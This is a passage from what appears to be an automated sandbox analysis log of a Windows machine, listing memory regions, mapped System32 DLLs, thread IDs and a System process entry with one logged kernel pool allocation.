entry_point = 0x7fefb140000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 747 start_va = 0x7fefb1c0000 end_va = 0x7fefb226fff entry_point = 0x7fefb1c0000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 748 start_va = 0x7fefb260000 end_va = 0x7fefb278fff entry_point = 0x7fefb260000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 749 start_va = 0x7fefb890000 end_va = 0x7fefb8a3fff entry_point = 0x7fefb890000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 750 start_va = 0x7fefb8b0000 end_va = 0x7fefb8c4fff entry_point = 
0x7fefb8b0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 751 start_va = 0x7fefb8d0000 end_va = 0x7fefb8dbfff entry_point = 0x7fefb8d0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 752 start_va = 0x7fefba10000 end_va = 0x7fefba20fff entry_point = 0x7fefba10000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 753 start_va = 0x7fefbff0000 end_va = 0x7fefc00cfff entry_point = 0x7fefbff0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 754 start_va = 0x7fefc540000 end_va = 0x7fefc66bfff entry_point = 0x7fefc540000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 755 start_va = 0x7fefca40000 end_va = 0x7fefca46fff entry_point = 0x7fefca40000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 756 start_va = 0x7fefcb30000 end_va = 0x7fefcb4afff entry_point = 0x7fefcb30000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 757 start_va = 0x7fefcb50000 end_va = 0x7fefcb6dfff entry_point = 0x7fefcb50000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 758 start_va = 0x7fefcca0000 end_va = 0x7fefcca9fff entry_point = 0x7fefcca0000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" 
(normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 759 start_va = 0x7fefcce0000 end_va = 0x7fefcd2bfff entry_point = 0x7fefcce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 760 start_va = 0x7fefcda0000 end_va = 0x7fefcde6fff entry_point = 0x7fefcda0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 761 start_va = 0x7fefcec0000 end_va = 0x7fefcf1afff entry_point = 0x7fefcec0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 762 start_va = 0x7fefd030000 end_va = 0x7fefd036fff entry_point = 0x7fefd030000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 763 start_va = 0x7fefd040000 end_va = 0x7fefd094fff entry_point = 0x7fefd040000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 764 start_va = 0x7fefd0a0000 end_va = 0x7fefd0b6fff entry_point = 0x7fefd0a0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 765 start_va = 0x7fefd1b0000 end_va = 0x7fefd1e1fff entry_point = 0x7fefd1b0000 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 766 start_va = 0x7fefd210000 end_va = 0x7fefd231fff entry_point = 0x7fefd210000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 767 start_va = 
0x7fefd2d0000 end_va = 0x7fefd33cfff entry_point = 0x7fefd2d0000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 768 start_va = 0x7fefd640000 end_va = 0x7fefd64afff entry_point = 0x7fefd640000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 769 start_va = 0x7fefd670000 end_va = 0x7fefd694fff entry_point = 0x7fefd670000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 770 start_va = 0x7fefd6a0000 end_va = 0x7fefd6aefff entry_point = 0x7fefd6a0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 771 start_va = 0x7fefd750000 end_va = 0x7fefd78cfff entry_point = 0x7fefd750000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 772 start_va = 0x7fefd790000 end_va = 0x7fefd7a3fff entry_point = 0x7fefd790000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 773 start_va = 0x7fefd7b0000 end_va = 0x7fefd7befff entry_point = 0x7fefd7b0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 774 start_va = 0x7fefd850000 end_va = 0x7fefd85efff entry_point = 0x7fefd850000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 775 start_va = 0x7fefd900000 end_va = 0x7fefd96afff entry_point = 0x7fefd900000 region_type = mapped_file 
name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 776 start_va = 0x7fefd990000 end_va = 0x7fefdaf6fff entry_point = 0x7fefd990000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 777 start_va = 0x7fefdb00000 end_va = 0x7fefdb35fff entry_point = 0x7fefdb00000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 778 start_va = 0x7fefdb80000 end_va = 0x7fefdc48fff entry_point = 0x7fefdb80000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 779 start_va = 0x7fefdc50000 end_va = 0x7fefdd26fff entry_point = 0x7fefdc50000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 780 start_va = 0x7fefdd30000 end_va = 0x7fefdd3dfff entry_point = 0x7fefdd30000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 781 start_va = 0x7fefdd40000 end_va = 0x7fefdd6dfff entry_point = 0x7fefdd40000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 782 start_va = 0x7fefdef0000 end_va = 0x7fefdef7fff entry_point = 0x7fefdef0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 783 start_va = 0x7fefed10000 end_va = 0x7fefed76fff entry_point = 0x7fefed10000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 
784 start_va = 0x7fefed80000 end_va = 0x7fefee88fff entry_point = 0x7fefed80000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 785 start_va = 0x7feff0f0000 end_va = 0x7feff1cafff entry_point = 0x7feff0f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 786 start_va = 0x7feff1d0000 end_va = 0x7feff2fcfff entry_point = 0x7feff1d0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 787 start_va = 0x7feff4e0000 end_va = 0x7feff550fff entry_point = 0x7feff4e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 788 start_va = 0x7feff560000 end_va = 0x7feff5f8fff entry_point = 0x7feff560000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 789 start_va = 0x7feff850000 end_va = 0x7feff86efff entry_point = 0x7feff850000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 790 start_va = 0x7feff870000 end_va = 0x7feffa72fff entry_point = 0x7feff870000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 791 start_va = 0x7feffa80000 end_va = 0x7feffb1efff entry_point = 0x7feffa80000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 792 start_va = 0x7feffb20000 end_va = 0x7feffb6cfff entry_point = 0x7feffb20000 region_type = mapped_file name = 
"ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 793 start_va = 0x7feffb80000 end_va = 0x7feffb80fff entry_point = 0x7feffb80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 794 start_va = 0x7fffff94000 end_va = 0x7fffff95fff entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 795 start_va = 0x7fffff96000 end_va = 0x7fffff97fff entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 796 start_va = 0x7fffff98000 end_va = 0x7fffff99fff entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 797 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 798 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 799 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 800 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 801 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 802 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 803 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 804 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 805 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 806 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 807 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 808 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 809 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 810 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 811 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Thread: id = 43 os_tid = 0x8f8 Thread: id = 44 os_tid = 0x8b0 Thread: id = 45 os_tid = 0x210 Thread: id = 46 os_tid = 0x7a4 Thread: id = 47 os_tid = 0x7a0 Thread: id = 48 os_tid = 0x798 Thread: id = 49 os_tid = 0x794 Thread: id = 50 os_tid = 0x674 Thread: id = 51 os_tid = 0x654 Thread: id = 52 os_tid = 0x5e8 Thread: id = 53 os_tid = 0x41c Thread: id = 54 os_tid = 0x418 Thread: id = 55 os_tid = 0x414 Thread: id = 56 os_tid = 0x3d8 Thread: id = 57 os_tid = 0x2b0 Thread: id = 58 os_tid = 0x290 Thread: id = 60 os_tid = 0x7ec Thread: id = 63 os_tid = 0x8f0 Thread: id = 65 os_tid = 0x900 Thread: id = 67 os_tid = 0x9a4 Thread: id = 68 os_tid = 0x9e8 Process: id = "7" image_name = "System" filename = "" page_root = "0x187000" os_pid = "0x4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = 
"kernel_analysis" parent_id = "0" os_parent_pid = "0x0" cmd_line = "" cur_dir = "" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 888 start_va = 0x10000 end_va = 0x32fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 889 start_va = 0x76e40000 end_va = 0x76fe8fff entry_point = 0x76e40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 890 start_va = 0x77020000 end_va = 0x7719ffff entry_point = 0x77020000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 891 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Thread: id = 69 os_tid = 0x8 Thread: id = 70 os_tid = 0x24 Thread: id = 71 os_tid = 0x30 Thread: id = 72 os_tid = 0x34 Thread: id = 73 os_tid = 0x40 [0231.310] ExAllocatePoolWithTag (PoolType=0x0, NumberOfBytes=0x1cff2, Tag=0x70764946) returned 0xfffffa80019e5000 Thread: id = 74 os_tid = 0xb0 Thread: id = 75 os_tid = 0xc4 Thread: id = 76 os_tid = 0x9c Thread: id = 77 os_tid = 0x78 Thread: id = 78 os_tid = 0xc0 Thread: id = 79 os_tid = 0x28 Thread: id = 80 os_tid = 0x3c Thread: id = 81 os_tid = 0x38 Thread: id = 82 os_tid = 0xcc Thread: id = 83 os_tid = 0x48 Thread: id = 84 os_tid = 0xd0 Thread: id = 85 os_tid = 0xb8 Thread: id = 86 os_tid = 0xd4 Thread: id = 87 os_tid = 0xd8 Thread: id = 88 os_tid = 0xdc Thread: id = 89 os_tid = 0xe8 Thread: id = 90 os_tid = 0xec Thread: id = 91 os_tid = 0x64 Thread: id = 92 os_tid = 0x2c Thread: id = 93 os_tid = 0xfc Thread: id = 94 os_tid = 0x104 Thread: id = 95 os_tid = 0x114 Thread: id = 96 os_tid = 0x4c Thread: id = 97 os_tid = 0x108 Thread: id = 98 os_tid = 0x80 Thread: id = 
99 os_tid = 0x88 Thread: id = 100 os_tid = 0x98 Thread: id = 101 os_tid = 0x8c Thread: id = 102 os_tid = 0x5c Thread: id = 103 os_tid = 0x10c Thread: id = 104 os_tid = 0x12c Thread: id = 105 os_tid = 0x130 Thread: id = 106 os_tid = 0x134 Thread: id = 107 os_tid = 0x138 Thread: id = 108 os_tid = 0x174 Thread: id = 109 os_tid = 0x90 Thread: id = 110 os_tid = 0x100 Thread: id = 111 os_tid = 0x74 Thread: id = 112 os_tid = 0x268 Thread: id = 113 os_tid = 0x2e4 Thread: id = 114 os_tid = 0x84 Thread: id = 115 os_tid = 0x68 Thread: id = 116 os_tid = 0x20 Thread: id = 117 os_tid = 0x3ac Thread: id = 118 os_tid = 0x42c Thread: id = 119 os_tid = 0x47c Thread: id = 120 os_tid = 0x94 Thread: id = 121 os_tid = 0x560 Thread: id = 122 os_tid = 0x598 Thread: id = 123 os_tid = 0x59c Thread: id = 124 os_tid = 0x5ec Thread: id = 125 os_tid = 0x5fc Thread: id = 126 os_tid = 0x680 Thread: id = 127 os_tid = 0x68c Thread: id = 128 os_tid = 0x69c Thread: id = 129 os_tid = 0x6a8 Thread: id = 130 os_tid = 0x6ac Thread: id = 131 os_tid = 0x6b4 Thread: id = 132 os_tid = 0x434 Thread: id = 133 os_tid = 0x1c Thread: id = 134 os_tid = 0x744 Thread: id = 135 os_tid = 0x430 Thread: id = 136 os_tid = 0x758 Thread: id = 137 os_tid = 0x0 Thread: id = 138 os_tid = 0x798 Thread: id = 139 os_tid = 0x7e0 Thread: id = 140 os_tid = 0x60 Thread: id = 141 os_tid = 0x50 Thread: id = 142 os_tid = 0xa0 Thread: id = 143 os_tid = 0x7f0